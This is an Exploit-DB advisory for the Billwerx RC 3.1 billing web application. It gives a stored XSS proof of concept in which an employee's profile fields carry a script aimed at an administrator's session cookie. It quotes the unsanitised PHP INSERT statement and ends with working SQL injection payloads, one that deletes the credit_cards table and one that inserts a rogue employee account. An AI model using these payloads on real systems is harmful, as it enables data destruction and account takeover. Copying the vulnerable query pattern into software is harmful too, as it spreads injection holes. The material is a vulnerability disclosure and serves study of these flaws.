Billwerx RC 3.1 - Multiple Vulnerabilities

EDB-ID:

10376

CVE:

N/A


Author:

mr_me

Type:

webapps


Platform:

Windows

Date:

2009-12-11


#################################################################

#

# Billwerx RC v3.1 Multiple Vulnerabilities

# Found By: mr_me

# Download: http://www.billwerx.com/download.php

# Tested On: Windows Vista

# Note: For educational purposes only

#

#################################################################



XSS POC:



A regular employee can embed javascript code that could be executed within the context of the admin's browser.

If the user edits their own profile by going to "http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2" 

and places "<script>alert(document.cookie)</script>" 

into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country' and then gives the following link to the admin:



http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2



The user could potentially log the admins cookie and reset their own session thus gaining administration access.



SQL Injection POC:



http://127.0.0.1/billwerx_public_beta/employees/company_files.php



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1



Here you can see in the code snip that the description post value is unsanitized. 



8<-------------snip-------------8<



$description = strtolower($_POST['description']);



$employee_id = $_SESSION['employee_id'];



$readfile = fopen($temp_name, 'r');

$content = fread($readfile, filesize($temp_name));

$content = addslashes($content);

fclose($readfile);



# Assign values to a database table:

$doSQL = "INSERT INTO company_files (name, size, type, content, public, description, employee_id) VALUES ('$name', '$size', '$type', '$content', '$public', '$description', '$employee_id')";



8<-------------snip-------------8<



SQL Injection exploit:



','1'); DELETE FROM credit_cards;/*



or



','1'); insert into employees values (4, 'mr_me', 'hello', '', '', '', '', '', 'mr_me@hax0r.com', 'lol_mypassword', 0.00, 3, '', '', '', '', '', '2009-07-28 10:47:59');/*